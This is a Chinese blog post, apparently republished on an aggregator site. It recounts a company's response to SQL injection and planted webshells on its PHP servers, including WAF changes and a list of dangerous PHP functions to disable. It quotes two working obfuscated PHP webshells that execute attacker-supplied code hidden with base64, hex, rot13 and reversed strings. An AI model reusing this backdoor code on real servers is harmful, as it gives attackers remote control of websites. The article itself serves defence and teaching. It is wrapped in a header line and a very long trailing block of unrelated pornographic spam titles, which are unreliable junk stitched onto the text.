成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁(yè) > 知識(shí)庫(kù) > 淺談一次與sql注入 & webshell 的美麗“邂逅”

淺談一次與sql注入 & webshell 的美麗“邂逅”

熱門(mén)標(biāo)簽:外呼系統(tǒng)電銷(xiāo)專(zhuān)用 百度地圖標(biāo)注不同路線 優(yōu)質(zhì)地圖標(biāo)注 千呼電銷(xiāo)機(jī)器人價(jià)格 奧威地圖標(biāo)注多個(gè)地方 武漢長(zhǎng)沙外呼系統(tǒng)方法和技巧 京華物流公司地圖標(biāo)注 怎樣在地圖上標(biāo)注路線圖標(biāo) 智能語(yǔ)音外呼系統(tǒng)選哪家

引言

一波未平,一波又起。金融公司的業(yè)務(wù)實(shí)在是太引人耳目,何況我們公司的業(yè)處正處于風(fēng)口之上(區(qū)塊鏈金融),并且每天有大量現(xiàn)金交易,所以不知道有多少躲在暗處一直在盯著你的系統(tǒng),讓你防不勝防,并且想方設(shè)法的找到突破點(diǎn),以達(dá)到的目的來(lái)獲取非法利益。

俗話說(shuō):“道高一尺,魔高一丈”。系統(tǒng)和代碼也可以這么理解,防的在好,總有漏洞。系統(tǒng)和代碼也沒(méi)有絕對(duì)的安全。該來(lái)的總會(huì)來(lái)......

sql注入與“她”相遇

某一天,天氣晴朗,心情舒暢?!八眮?lái)了,打破了筆者的美好時(shí)光。下午2點(diǎn)多鐘,筆者和朋友在蘇州街的天使匯二樓極客咖啡參加某個(gè)云廠商的Kubernetes一場(chǎng)技術(shù)沙龍,正聽(tīng)得興致勃勃的時(shí)候,筆者的公司群里有個(gè)php開(kāi)發(fā)突然帖出一張圖:

這個(gè)時(shí)候,群里翻騰了。沒(méi)錯(cuò),被SQL注入了,數(shù)據(jù)庫(kù)的表被注入了字段,并且經(jīng)檢查后,發(fā)現(xiàn)這個(gè)庫(kù)中的大部分表都被注入了這個(gè)字段。我的電腦沒(méi)帶在身邊,真是著急,馬上跟總監(jiān)說(shuō)明問(wèn)題嚴(yán)重性。由于我電腦不在身邊, 只能把數(shù)據(jù)庫(kù)賬號(hào)授權(quán)(讀寫(xiě)權(quán)限)給那個(gè)php開(kāi)發(fā),讓他檢查所有的表,把被注入的字段刪除掉。并查看數(shù)據(jù)和其它表有沒(méi)有被修改。好在發(fā)現(xiàn)急時(shí),數(shù)據(jù)和業(yè)務(wù)都沒(méi)有被丟失和損壞。

這里我要說(shuō)明一下,我們的業(yè)務(wù)都在阿里云,項(xiàng)目是以php為主,并且開(kāi)通了waf防火墻,只是waf上的防護(hù)措施比較寬松。筆者在安全方面的經(jīng)驗(yàn)也比較欠缺,好在開(kāi)通了阿里云的WAF,讓筆者在排查和防護(hù)上也變得輕松和快捷。

此時(shí),我已經(jīng)在回家的路上,回到家中迅速打開(kāi)電腦。

調(diào)整waf策略

由于筆者也是剛接手工作,阿里云上的很多策略還沒(méi)得到及時(shí)調(diào)整。所以才這么容易被攻進(jìn)來(lái)。即然被注入了,肯定要把源給揪出來(lái)。我也在次把所有的表都檢查一遍,確認(rèn)沒(méi)問(wèn)題后,在去調(diào)整waf策略,進(jìn)入阿里云。

1、進(jìn)入相關(guān)域名的防護(hù)配置,我們先來(lái)看下調(diào)整前的策略,如下圖:


從上圖可以看出,“Web應(yīng)用防護(hù)”策略是寬松模式,其主要作用就是防護(hù)SQL注入、XSS跨站等常見(jiàn)Web應(yīng)用,寬松模式下對(duì)業(yè)務(wù)的誤報(bào)程度最低,但也容易漏過(guò)***?!皭阂釯P懲罰”也沒(méi)啟用。這么寬松的防護(hù)措施風(fēng)險(xiǎn)比較大。趕緊先調(diào)整吧。

2、調(diào)整后的策略(如有多個(gè)域名,都調(diào)整過(guò)來(lái)),如下圖:

防護(hù)策略調(diào)整過(guò)了,還需要把問(wèn)題根源找到啊,這才是最重要的?。?!

查找可疑文件

此時(shí),php的項(xiàng)目源碼分布在好幾臺(tái)服務(wù)器上,如果靠傳統(tǒng)方式去排查,挨個(gè)檢查這些服務(wù)器的目錄,各種能用的命令都用上了,是不是也挺費(fèi)勁費(fèi)時(shí)的,還不知道要查到啥時(shí)候。這個(gè)時(shí)候,阿里有項(xiàng)服務(wù)起到關(guān)鍵的作用了:“態(tài)勢(shì)感知”,這個(gè)需要升級(jí)為企業(yè)版本(費(fèi)用不高,我們公司開(kāi)通了一年,費(fèi)用6000多塊)。這就是用阿里的好處(不是打廣告),確實(shí)讓你省心。

1、進(jìn)入“態(tài)勢(shì)感知”查看一下,就立馬發(fā)現(xiàn)了一堆異常行為,遍布在好幾臺(tái)服務(wù)器上如下圖:

2、點(diǎn)幾個(gè)異常行為進(jìn)入看看,我就打開(kāi)其中兩個(gè)行為看一下,其它的行為也都差不多,如下圖:


從命令行參數(shù)中可以看出相關(guān)目錄有/Mode/Lite/ ,并且給出的解決方案是及時(shí)排查可疑目錄下的信息并及時(shí)清除。筆者順著給出的提示在服務(wù)器上進(jìn)行 find 相關(guān)目錄,查找出目錄所在路徑,如下圖:

順藤摸瓜吧,列一下這個(gè)目錄的文件:

從上圖發(fā)現(xiàn)了有兩個(gè)異常的php文件,目錄屬主也和其它文件不一樣,筆者打開(kāi)代碼倉(cāng)庫(kù)也進(jìn)入相同的目錄進(jìn)行比對(duì),代碼倉(cāng)庫(kù)中確實(shí)沒(méi)有這兩個(gè)文件。為了確認(rèn)清楚,把這兩個(gè)文件down下來(lái)發(fā)給開(kāi)發(fā)。開(kāi)發(fā)說(shuō)項(xiàng)目中沒(méi)有這兩個(gè)文件。把它down下來(lái)打開(kāi)文件看看:

Content.class.php文件內(nèi)容:

?php @($_=base64_decode($_POST[1])).$_(hex2bin($_POST[2]))?>
}

這代碼不就是被注入的表里的字段嗎,上面這段代碼大概意思為:把post請(qǐng)求的兩個(gè)參數(shù),一個(gè)用base64解密,一個(gè)用hex2bin轉(zhuǎn)成16進(jìn)制,然后拼接在一起,應(yīng)該是把操作數(shù)據(jù)庫(kù)的語(yǔ)句加密傳過(guò)來(lái),然后解密,這樣就不會(huì)被攔截掉。如果哪位博友認(rèn)為解釋的有誤,一定要提出來(lái)。

Lite.class.php文件內(nèi)容:

?php if(isset($_REQUEST['error'])isset($_REQUEST['limit'])){
  $page = $_REQUEST['error'];
  $limit = $_REQUEST['limit'];
  $func = base64_decode(str_rot13(strrev($limit)));
  $func(base64_decode(str_rot13(strrev($page))));
  exit;

上面的代碼其實(shí)和之前的那段代碼有共性,反轉(zhuǎn)字符串然后ROT13 編碼,然后base64解碼,最后按照 PHP 代碼來(lái)計(jì)算,至于base64_decode,str_rot13,strrev是為了繞過(guò)WAF等安全設(shè)備的過(guò)濾。

已經(jīng)很明顯了,就是由上面這些代碼文件Content.class.php等文件給注入的。不用想了:rm -rf 吧。這個(gè)動(dòng)態(tài)感知還是挺好用的,能快速定位到風(fēng)險(xiǎn)目錄,讓你減少排查的時(shí)間和精力。

為了保險(xiǎn)起見(jiàn),繼續(xù)排查一下其它的目錄是否也存在可疑文件,一定要排查干凈了,操作一定要小心,也別誤刪,果然在同級(jí)目錄下又發(fā)現(xiàn)一個(gè),如下圖:

還有一個(gè),如下圖:

和代碼倉(cāng)庫(kù)、開(kāi)發(fā)的對(duì)比,可以確定這兩個(gè)也是***傳進(jìn)來(lái)的可疑文件,我有一個(gè)習(xí)慣,刪除文件之前喜歡備份到本地。備份好這些可疑文件到本地之,都徹底清除掉。

雖然都清除掉了,waf防火墻也調(diào)整了,但是也沒(méi)有絕對(duì)的安全,還需要把php這些危險(xiǎn)的函數(shù)禁用掉,比如禁用phpinfo、exec()、system()等:

phpinfo()
功能描述:輸出 PHP 環(huán)境信息以及相關(guān)的模塊、WEB 環(huán)境等信息。
危險(xiǎn)等級(jí):中

passthru()
功能描述:允許執(zhí)行一個(gè)外部程序并回顯輸出,類(lèi)似于 exec()。
危險(xiǎn)等級(jí):高

exec()
功能描述:允許執(zhí)行一個(gè)外部程序(如 UNIX Shell 或 CMD 命令等)。
危險(xiǎn)等級(jí):高

system()
功能描述:允許執(zhí)行一個(gè)外部程序并回顯輸出,類(lèi)似于 passthru()。
危險(xiǎn)等級(jí):高

chroot()
功能描述:可改變當(dāng)前 PHP 進(jìn)程的工作根目錄,僅當(dāng)系統(tǒng)支持 CLI 模式
PHP 時(shí)才能工作,且該函數(shù)不適用于 Windows 系統(tǒng)。
危險(xiǎn)等級(jí):高

scandir()
功能描述:列出指定路徑中的文件和目錄。
危險(xiǎn)等級(jí):中

chgrp()
功能描述:改變文件或目錄所屬的用戶組。
危險(xiǎn)等級(jí):高

chown()
功能描述:改變文件或目錄的所有者。
危險(xiǎn)等級(jí):高

shell_exec()
功能描述:通過(guò) Shell 執(zhí)行命令,并將執(zhí)行結(jié)果作為字符串返回。
危險(xiǎn)等級(jí):高

proc_open()
功能描述:執(zhí)行一個(gè)命令并打開(kāi)文件指針用于讀取以及寫(xiě)入。
危險(xiǎn)等級(jí):高

proc_get_status()
功能描述:獲取使用 proc_open() 所打開(kāi)進(jìn)程的信息。
危險(xiǎn)等級(jí):高

ini_alter()
功能描述:是 ini_set() 函數(shù)的一個(gè)別名函數(shù),功能與 ini_set() 相同。
具體參見(jiàn) ini_set()。
危險(xiǎn)等級(jí):高

ini_set()
功能描述:可用于修改、設(shè)置 PHP 環(huán)境配置參數(shù)。
危險(xiǎn)等級(jí):高

ini_restore()
功能描述:可用于恢復(fù) PHP 環(huán)境配置參數(shù)到其初始值。
危險(xiǎn)等級(jí):高

dl()
功能描述:在 PHP 進(jìn)行運(yùn)行過(guò)程當(dāng)中(而非啟動(dòng)時(shí))加載一個(gè) PHP 外部模塊。
危險(xiǎn)等級(jí):高

pfsockopen()
功能描述:建立一個(gè) Internet 或 UNIX 域的 socket 持久連接。
危險(xiǎn)等級(jí):高

symlink()
功能描述:在 UNIX 系統(tǒng)中建立一個(gè)符號(hào)鏈接。
危險(xiǎn)等級(jí):高

popen()
功能描述:可通過(guò) popen() 的參數(shù)傳遞一條命令,并對(duì) popen() 所打開(kāi)的文件進(jìn)行執(zhí)行。
危險(xiǎn)等級(jí):高

putenv()
功能描述:用于在 PHP 運(yùn)行時(shí)改變系統(tǒng)字符集環(huán)境。在低于 5.2.6 版本的 PHP 中,可利用該函數(shù)
修改系統(tǒng)字符集環(huán)境后,利用 sendmail 指令發(fā)送特殊參數(shù)執(zhí)行系統(tǒng) SHELL 命令。
危險(xiǎn)等級(jí):高

禁用方法如下:
打開(kāi)/etc/php.ini文件,查找到 disable_functions ,添加需禁用的函數(shù)名,如下:
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen

趁著這次事件,把其它服務(wù)器也一并排查一下吧,需要點(diǎn)耐心慢慢排查,***把這些可疑文件偽裝的非常好,繞過(guò)了waf墻,人的肉眼不仔細(xì)看它都看不出來(lái),所以還是要自己細(xì)心一點(diǎn)干活。

需要聲明一下:每個(gè)人的做事方式都不一樣,本文只是把筆者遇到的事件分享給大家,僅作為交流和學(xué)習(xí)。

名詞解釋

sql注入:

所謂SQL注入,就是通過(guò)把SQL命令插入到Web表單提交或輸入域名或頁(yè)面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來(lái)說(shuō),它是利用現(xiàn)有應(yīng)用程序,將(惡意的)SQL命令注入到后臺(tái)數(shù)據(jù)庫(kù)引擎執(zhí)行的能力,它可以通過(guò)在Web表單中輸入(惡意)SQL語(yǔ)句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫(kù),而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語(yǔ)句。 比如先前的很多影視網(wǎng)站泄露VIP會(huì)員密碼大多就是通過(guò)WEB表單遞交查詢字符暴出的,這類(lèi)表單特別容易受到SQL注入式***.

webshell:

webshell就是以asp、php、jsp或者cgi等網(wǎng)頁(yè)文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁(yè)后門(mén)。了一個(gè)網(wǎng)站后,通常會(huì)將asp或php后門(mén)文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁(yè)文件混在一起,然后就可以使用瀏覽器來(lái)訪問(wèn)asp或者php后門(mén),得到一個(gè)命令執(zhí)行環(huán)境,以達(dá)到控制網(wǎng)站服務(wù)器的目的。
顧名思義,“web”的含義是顯然需要服務(wù)器開(kāi)放web服務(wù),“shell”的含義是取得對(duì)服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為***者通過(guò)網(wǎng)站端口對(duì)網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限。由于webshell其大多是以動(dòng)態(tài)腳本的形式出現(xiàn),也有人稱之為網(wǎng)站的后門(mén)工具。

安全防范小結(jié)

歸納一下,主要有以下幾點(diǎn):
1.永遠(yuǎn)不要信任用戶的輸入。對(duì)用戶的輸入進(jìn)行校驗(yàn),可以通過(guò)正則表達(dá)式,或限制長(zhǎng)度;對(duì)單引號(hào)和雙"-"進(jìn)行轉(zhuǎn)換等。
2.永遠(yuǎn)不要使用動(dòng)態(tài)拼裝sql,可以使用參數(shù)化的sql或者直接使用存儲(chǔ)過(guò)程進(jìn)行數(shù)據(jù)查詢存取。
3.永遠(yuǎn)不要使用管理員權(quán)限的數(shù)據(jù)庫(kù)連接,為每個(gè)應(yīng)用使用單獨(dú)的權(quán)限有限的數(shù)據(jù)庫(kù)連接。
4.不要把機(jī)密信息直接存放,加密或者h(yuǎn)ash掉密碼和敏感的信息。
5.應(yīng)用的異常信息應(yīng)該給出盡可能少的提示,最好使用自定義的錯(cuò)誤信息對(duì)原始錯(cuò)誤信息進(jìn)行包裝。
6.sql注入的檢測(cè)方法一般采取輔助軟件或網(wǎng)站平臺(tái)來(lái)檢測(cè),軟件一般采用sql注入檢測(cè)工具jsky,網(wǎng)站平臺(tái)就有億思網(wǎng)站安全平臺(tái)檢測(cè)工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入,XSS***等。

以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。

您可能感興趣的文章:
  • MySQL注入中導(dǎo)出字段內(nèi)容的研究通過(guò)注入導(dǎo)出WebShell

標(biāo)簽:防疫戰(zhàn)設(shè) 宿州 益陽(yáng) 銅仁 威海 來(lái)賓 天水 七臺(tái)河

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《淺談一次與sql注入 & webshell 的美麗“邂逅”》,本文關(guān)鍵詞  淺談,一次,與,sql,注入,amp,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《淺談一次與sql注入 & webshell 的美麗“邂逅”》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于淺談一次與sql注入 & webshell 的美麗“邂逅”的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    国产三级精品视频| 一本大道久久a久久精品综合| 国产伦精品一区二区三区视频我| 日本午夜一区二区三区| 日本成人一区二区| 久久中文字幕二区| 日韩中文视频免费在线观看| 久久久成人免费视频| 7777精品| 欧美一区二区三区在线免费观看| 免费看av不卡| 亚州精品国产精品乱码不99按摩| yw在线观看| 国产精品一区二区三区免费视频| 九九视频免费在线观看| 欧美三级特黄| 国产超碰精品在线观看| 欧美激情无毛| 91在线播放国产| 日本久久久久久久久| 国产精品 欧美在线| www.啪啪.com| 精品影片在线观看的网站| 日韩精品欧美一区二区三区| 欧美专区视频| 久久国产精品一区二区| 日韩国产小视频| 亚洲高清影院| 91精品一区二区三区久久久久久| 日韩午夜三级在线| 狠狠入ady亚洲精品| 久久久精品影视| 北条麻妃在线一区二区| 国产福利视频网站| 国产精品网址| 97免费中文视频在线观看| av中文字幕不卡| 日韩成人视屏| 丁香五六月婷婷久久激情| 久久久久久久久久久久久国产精品| 成年人在线网站| 国产精品国产三级国产普通话蜜臀| 黄色免费成人| 国产精品久久久久久久app| 日韩一区二区免费视频| 国产aaa免费视频| 日本www视频在线观看| 成人在线免费小视频| 都市激情一区| 日本欧美视频| 午夜电影一区二区三区| 日本一区视频在线播放| 91大神在线资源观看无广告| 国产成人自拍网站| 性色一区二区| 秋霞精品一区二区三区| 国产精品久久久久久久妇| 116美女写真午夜一级久久| 亚洲男人第一av网站| 国产av一区二区三区精品| 精品一二三四区| 亚洲一区二区三区中文字幕| 午夜欧美理论片| 625成人欧美午夜电影| 国产福利一区二区三区在线视频| 国产又爽又黄网站亚洲视频123| 成人做爰免费视频免费看| 国产成人一区二区三区别| 黄色在线免费观看大全| 亚洲黄色免费三级| 亚洲女同av| 毛片a片免费观看| 国产亚洲精品美女久久| 久久国产精品黑丝| 狠狠狠色丁香婷婷综合激情| 中文字幕在线观看免费| 成人福利影视| 在线成人动漫| 日韩a在线观看| 亚洲综合激情在线| 国产精品久久久99| 在线视频中文亚洲| 日本成年免费网站| 天堂电影院在线| 丝瓜av网站精品一区二区| 国产高潮久久久| 国产欧美日韩精品专区| 国产精品免费久久久久久| 波多野结衣乳巨码无在线| 毛片在线免费视频| 中文字幕一区二区三区在线播放| 精品亚洲欧美日韩| 亚洲av无码国产精品久久| 亚洲va欧美va天堂v国产综合| 日韩精品一区二区三区swag| 精品人妻一区二区三区香蕉| 高清精品视频| 伊人伊成久久人综合网小说| 精品日本一区二区| 国产精品麻豆一区二区| 日韩成人午夜电影| 日韩av一二三四区| 91青青草视频| 天天综合色天天综合色hd| 国产精品情侣自拍| 国产精品毛片a∨一区二区三区|国| 黄视频在线观看网站| 日日噜噜夜夜狠狠久久波多野| 日日骚一区二区三区| japonensisjava老师可播放| 日韩精品一区二区三区中文在线| 精品卡1卡2卡三卡免费网站| 91淫黄看大片| 91一区二区三区在线| 德国性xxxx| 超碰人人草人人| 亚洲激情自拍偷拍| 欧美大片欧美激情性色a∨久久| 99久久久国产精品| 青娱乐国产精品视频| 91极品女神在线| 精品视频免费在线观看| 欧美精品日韩一区| 国产精品久久久久国产精品日日| 欧美日韩xxxx| 国产精品无码av在线播放| 全部免费毛片在线播放一个| 欧美色图婷婷| www.欧美激情.com| 国产91绿帽单男绿奴| 精品少妇一区二区三区密爱| 国产精品99蜜臀久久不卡二区| 国产乱淫片视频| 97超碰中文字幕| 手机看片1024日韩| 日韩国产精品久久久久久亚洲| 二区在线视频| 99久久精品国产精品久久| 色婷婷精品久久二区二区密| 天堂在线免费观看| 国产尤物av一区二区三区| 91一区二区三区在线| 热久久这里只有| 麻豆免费版在线观看| 浮妇高潮喷白浆视频| 国产三级欧美三级日产三级99| 国产精品丝袜久久久久久消防器材| 亚洲午夜精品一区| 国产无遮挡又黄又爽免费软件| 日韩精品福利在线| 综合日韩在线| 国产精品久久久亚洲| 激情另类小说区图片区视频区| 久久精品欧美日韩精品| 一区二区久久久久| 精品国产一区二区三区小蝌蚪| 精品处破女学生| 欧美理论电影在线播放| 久久综合图片| 加勒比婷婷色综合久久| 久久久99精品| 久久精品国产亚洲av无码娇色| 欧美视频在线视频| 国产欧美在线观看视频| 草草视频在线免费观看| 试看120秒一区二区三区| 强行糟蹋人妻hd中文| 欧美日本色图| 久久久99精品免费观看不卡| 多人欧美交性姿势| 成人a区在线观看| 特级西西444www大精品视频免费看| 国产精品亚洲色图| 精品在线视频免费观看| 久久久无码精品亚洲日韩按摩| 欧美专区亚洲专区| 国产欧洲精品视频| 成人午夜在线免费| 鬼打鬼之黄金道士1992林正英| 日本一区二区三区国色天香| 国产精品视频一区二区三区四区五区| 亚洲大香人伊一本线| 色欲人妻综合网| 每日在线观看av| 性色av一区二区怡红| av最新网址| 日韩三级电影网站| 日韩av成人在线| 色戒汤唯在线观看| 亚洲成人动漫一区| 在线精品国产成人综合| 亚欧美一区二区三区| 激情视频在线观看免费| 成人女同在线观看| 色婷婷综合久久久久中文一区二区| 狠狠综合久久av一区二区老牛| 黄色国产网站在线播放| 中文字幕亚洲精品在线| 欧美另类tv| 欧美另类videos黑人极品| 国产小视频在线免费观看| 在线观看日本www| 久久久免费毛片| 国产导航在线| 91亚洲va在线va天堂va国| 香蕉污视频在线观看| 久久精品magnetxturnbtih| sis001亚洲原创区| 亚洲国产精品视频| 国产伦精品一区二区三区视频| 三级小说欧洲区亚洲区| 国产一区二区丝袜| 这里只有久久精品| 黄页免费欧美| 主播国产精品| 亚洲一二三不卡| 天天干天天操天天干天天操| 91亚洲精品久久久蜜桃| 欧洲精品毛片网站| 国色天香一二三期区别大象| 中文字幕一区二区三区在线播放| 人人狠狠综合久久亚洲婷| 巨胸大乳www视频免费观看| 91国语精品自产拍在线观看性色| 国产成人影院| 亚洲国产精华液网站w| 国产福利第一视频| 国产资源在线观看| 久久99精品国产99久久6尤物| 中文字幕+乱码+中文字幕一区| 激情中国色综合| 中文文精品字幕一区二区| 欧美成人69av| 免费男女羞羞的视频网站中文字幕妖精视频| 16—17女人毛片毛片| 国产农村妇女aaaaa视频| 亚洲熟妇无码一区二区三区导航| 成人性色生活片免费看爆迷你毛片| 伊甸园精品99久久久久久| 免费成人午夜视频| 亚洲人成网站77777在线观看| 成年网站在线在免费播放| 久久久一区二区| 欧美成人国产一区二区| 4388成人网| 成人高清dvd| 女性裸体视频网站| 成人综合专区| 2018中文字幕在线观看| 欧美一级日韩不卡播放免费| h片在线观看下载| 99久久国产综合精品色伊| 性感美女一区二区三区| 欧美一区二视频在线免费观看| 91黑丝高跟在线| 东北一级毛片| 成年网站免费在线观看| 久久精品久久精品久久| 国产秀色在线www免费观看| 久久久久亚洲精品一区二区三区| 天天看天天摸天天操| 亚洲色图欧美制服丝袜另类第一页| 99久久国产免费| 97超级碰碰人国产在线观看| 中文人妻一区二区三区| 丝袜人妻一区二区三区| 小说区图片区亚洲| 高清中文字幕mv的电影| 韩国中文免费在线视频| 国产女人爽到高潮a毛片| 中文字幕一区二区三区四区五区人| 一区二区成人在线观看| 欧美极品免费| 国产免费一区二区三区香蕉精| 美女福利视频一区二区| 久久老司机精品视频| 日韩有码电影| 精品影院一区| 三级成人在线视频| 污视频网站在线播放| 欧美成欧美va| 国产乡下妇女做爰毛片| 亚洲毛片在线观看| 99久久免费国产| h狠狠躁死你h高h| 亚洲av成人精品一区二区三区| 色呦呦在线看| 日本在线观看视频网站| 国产亚洲精品久久久久久| 天天色天天干天天色| 手机看片久久久| 久久不卡国产精品一区二区| 欧美日韩国产电影| 伊人久久综合网另类网站| 国产 欧美 日本| 日本va欧美va欧美va精品| 国产www在线观看| 久草视频一区二区| 亚洲国产精彩中文乱码av在线播放| 麻豆freexxxx性91精品| 日韩精品一卡二卡| 久久精品国产v日韩v亚洲| 亚洲三级在线看| 国产精品一区二区欧美黑人喷潮水| 国产小视频在线观看| 国产高清日韩| 亚洲欧美国产不卡| 精品综合久久久久久8888| 欧美成人福利| 亚洲欧洲精品天堂一级| 亚洲区小说区图片区| 精品一区二区三区四区五区| 精品av导航| 亚洲а∨天堂久久精品喷水| 黄网页免费在线观看| 免费看男男www网站入口在线| www国产成人免费观看视频 深夜成人网| yellow在线观看网址| 婷婷色在线资源| 在线免费av网| 欧美一区二区视频| 国偷自产一区二区免费视频| 日韩精品视频观看| 亚洲国产日韩a在线播放性色| 91国产美女视频| 九色精品视频在线观看| 亚洲开发第一视频在线播放| 国产高清在线一区|